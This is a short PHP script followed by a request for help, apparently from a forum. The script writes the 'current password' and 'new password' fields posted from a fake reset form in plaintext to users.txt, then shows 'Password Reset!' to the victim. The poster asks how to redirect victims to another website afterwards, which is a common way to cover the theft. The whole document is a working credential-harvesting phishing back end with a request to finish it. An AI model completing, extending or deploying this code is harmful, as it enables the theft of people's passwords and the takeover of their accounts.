<?php
// Open the text file
$f = fopen("users.txt", "a");
// Write text
fwrite($f, $_POST["_current_password1_"]);
fwrite($f, $_POST["_new_password1_"]);
// Close the text file
fclose($f);
print "Password Reset!";
?>
How to have this redirect to a different website after it is done showing "Password Reset!" ( Not good at coding )